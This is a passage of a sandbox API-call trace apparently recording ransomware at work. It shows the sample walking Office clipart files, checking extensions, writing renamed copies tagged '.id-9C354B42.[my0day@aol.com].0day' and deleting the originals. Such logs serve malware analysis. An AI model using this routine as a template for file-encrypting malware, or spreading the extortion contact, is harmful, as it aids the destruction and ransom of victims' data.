(lpString=".dbf") returned 4 [0271.152] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.152] lstrlenW (lpString=".1cd") returned 4 [0271.152] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.152] lstrlenW (lpString=".jpg") returned 4 [0271.152] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.153] lstrlenW (lpString=".doc") returned 4 [0271.153] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.153] lstrlenW (lpString=".docx") returned 5 [0271.153] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.153] lstrlenW (lpString=".pdf") returned 4 [0271.153] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.153] lstrlenW (lpString=".xls") returned 4 [0271.153] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.153] lstrlenW (lpString=".xlsx") returned 5 [0271.153] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.153] lstrlenW (lpString=".ppt") returned 4 [0271.153] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.153] lstrlenW (lpString=".zip") returned 4 [0271.153] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.153] lstrlenW (lpString=".rar") returned 4 [0271.153] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.153] lstrlenW (lpString=".bz2") returned 4 [0271.153] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.153] lstrlenW (lpString=".7z") returned 3 [0271.153] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.153] lstrlenW (lpString=".dbf") returned 4 [0271.153] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.153] lstrlenW (lpString=".1cd") returned 4 [0271.153] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.154] lstrlenW (lpString=".jpg") returned 4 [0271.154] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.154] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.154] lstrlenW (lpString="PARNT_05.MID") returned 12 [0271.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.162] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=6020) returned 1 [0271.162] CloseHandle (hObject=0x2cc) returned 1 [0271.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid")) returned 0x20 [0271.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.429] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.429] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.489] GetLastError () returned 0x0 [0271.489] ReadFile (in: hFile=0x394, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1784, lpOverlapped=0x0) returned 1 [0271.493] WriteFile (in: hFile=0x38c, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1790, lpOverlapped=0x0) returned 1 [0271.495] ReadFile (in: hFile=0x394, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.495] WriteFile (in: hFile=0x38c, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.495] SetEndOfFile (hFile=0x38c) returned 1 [0271.496] CloseHandle (hObject=0x38c) returned 1 [0271.496] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.496] SetEndOfFile (hFile=0x394) returned 1 [0271.672] CloseHandle (hObject=0x394) returned 1 [0271.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.717] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid")) returned 1 [0271.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.717] lstrlenW (lpString=".doc") returned 4 [0271.717] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.717] lstrlenW (lpString=".docx") returned 5 [0271.717] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1 [0271.717] lstrlenW (lpString=".pdf") returned 4 [0271.717] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.717] lstrlenW (lpString=".xls") returned 4 [0271.717] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.717] lstrlenW (lpString=".xlsx") returned 5 [0271.717] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1 [0271.717] lstrlenW (lpString=".ppt") returned 4 [0271.717] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.717] lstrlenW (lpString=".zip") returned 4 [0271.717] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.717] lstrlenW (lpString=".rar") returned 4 [0271.717] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.717] lstrlenW (lpString=".bz2") returned 4 [0271.718] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.718] lstrlenW (lpString=".7z") returned 3 [0271.718] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.718] lstrlenW (lpString=".dbf") returned 4 [0271.718] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.718] lstrlenW (lpString=".1cd") returned 4 [0271.718] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.718] lstrlenW (lpString=".jpg") returned 4 [0271.718] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.718] lstrlenW (lpString=".doc") returned 4 [0271.718] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.718] lstrlenW (lpString=".docx") returned 5 [0271.718] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1 [0271.718] lstrlenW (lpString=".pdf") returned 4 [0271.718] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.718] lstrlenW (lpString=".xls") returned 4 [0271.718] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.718] lstrlenW (lpString=".xlsx") returned 5 [0271.718] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1 [0271.718] lstrlenW (lpString=".ppt") returned 4 [0271.718] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.718] lstrlenW (lpString=".zip") returned 4 [0271.718] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.719] lstrlenW (lpString=".rar") returned 4 [0271.719] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.719] lstrlenW (lpString=".bz2") returned 4 [0271.719] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.719] lstrlenW (lpString=".7z") returned 3 [0271.719] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.719] lstrlenW (lpString=".dbf") returned 4 [0271.719] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.719] lstrlenW (lpString=".1cd") returned 4 [0271.719] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 63 [0271.719] lstrlenW (lpString=".jpg") returned 4 [0271.719] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.719] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.719] lstrlenW (lpString="SHOW_01.MID") returned 11 [0271.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.719] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=6392) returned 1 [0271.720] CloseHandle (hObject=0x38c) returned 1 [0271.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid")) returned 0x20 [0271.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.720] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.720] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.720] GetLastError () returned 0x0 [0271.720] ReadFile (in: hFile=0x38c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x18f8, lpOverlapped=0x0) returned 1 [0271.808] WriteFile (in: hFile=0x39c, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1900, lpOverlapped=0x0) returned 1 [0271.809] ReadFile (in: hFile=0x38c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.809] WriteFile (in: hFile=0x39c, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0271.809] SetEndOfFile (hFile=0x39c) returned 1 [0271.828] CloseHandle (hObject=0x39c) returned 1 [0271.918] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.918] SetEndOfFile (hFile=0x38c) returned 1 [0271.942] CloseHandle (hObject=0x38c) returned 1 [0271.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid")) returned 1 [0271.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.964] lstrlenW (lpString=".doc") returned 4 [0271.964] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.964] lstrlenW (lpString=".docx") returned 5 [0271.964] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.964] lstrlenW (lpString=".pdf") returned 4 [0271.964] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.965] lstrlenW (lpString=".xls") returned 4 [0271.965] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.965] lstrlenW (lpString=".xlsx") returned 5 [0271.965] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.965] lstrlenW (lpString=".ppt") returned 4 [0271.965] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.965] lstrlenW (lpString=".zip") returned 4 [0271.965] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.965] lstrlenW (lpString=".rar") returned 4 [0271.965] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.965] lstrlenW (lpString=".bz2") returned 4 [0271.965] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.965] lstrlenW (lpString=".7z") returned 3 [0271.965] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.965] lstrlenW (lpString=".dbf") returned 4 [0271.965] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.965] lstrlenW (lpString=".1cd") returned 4 [0271.965] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.965] lstrlenW (lpString=".jpg") returned 4 [0271.965] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.965] lstrlenW (lpString=".doc") returned 4 [0271.965] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.965] lstrlenW (lpString=".docx") returned 5 [0271.965] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.965] lstrlenW (lpString=".pdf") returned 4 [0271.965] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.965] lstrlenW (lpString=".xls") returned 4 [0271.966] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.966] lstrlenW (lpString=".xlsx") returned 5 [0271.966] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.966] lstrlenW (lpString=".ppt") returned 4 [0271.966] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.966] lstrlenW (lpString=".zip") returned 4 [0271.966] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.966] lstrlenW (lpString=".rar") returned 4 [0271.966] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.966] lstrlenW (lpString=".bz2") returned 4 [0271.966] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.966] lstrlenW (lpString=".7z") returned 3 [0271.966] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.966] lstrlenW (lpString=".dbf") returned 4 [0271.966] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.966] lstrlenW (lpString=".1cd") returned 4 [0271.966] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0271.966] lstrlenW (lpString=".jpg") returned 4 [0271.967] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.967] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.967] lstrlenW (lpString="URBAN_01.MID") returned 12 [0271.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.967] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=13358) returned 1 [0271.967] CloseHandle (hObject=0x3a0) returned 1 [0271.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 0x20 [0271.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.968] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.968] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.968] GetLastError () returned 0x0 [0271.968] ReadFile (in: hFile=0x3a0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x342e, lpOverlapped=0x0) returned 1 [0271.999] WriteFile (in: hFile=0x2cc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x3430, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x3430, lpOverlapped=0x0) returned 1 [0272.001] ReadFile (in: hFile=0x3a0, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.001] WriteFile (in: hFile=0x2cc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.001] SetEndOfFile (hFile=0x2cc) returned 1 [0272.001] CloseHandle (hObject=0x2cc) returned 1 [0272.001] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.001] SetEndOfFile (hFile=0x3a0) returned 1 [0272.004] CloseHandle (hObject=0x3a0) returned 1 [0272.004] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.022] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 1 [0272.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.053] lstrlenW (lpString=".doc") returned 4 [0272.053] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.053] lstrlenW (lpString=".docx") returned 5 [0272.053] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.053] lstrlenW (lpString=".pdf") returned 4 [0272.053] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.053] lstrlenW (lpString=".xls") returned 4 [0272.053] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.053] lstrlenW (lpString=".xlsx") returned 5 [0272.053] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.053] lstrlenW (lpString=".ppt") returned 4 [0272.053] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.053] lstrlenW (lpString=".zip") returned 4 [0272.053] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.053] lstrlenW (lpString=".rar") returned 4 [0272.053] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.053] lstrlenW (lpString=".bz2") returned 4 [0272.053] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.053] lstrlenW (lpString=".7z") returned 3 [0272.053] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.053] lstrlenW (lpString=".dbf") returned 4 [0272.053] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.053] lstrlenW (lpString=".1cd") returned 4 [0272.053] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.054] lstrlenW (lpString=".jpg") returned 4 [0272.054] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.054] lstrlenW (lpString=".doc") returned 4 [0272.054] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.054] lstrlenW (lpString=".docx") returned 5 [0272.054] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.054] lstrlenW (lpString=".pdf") returned 4 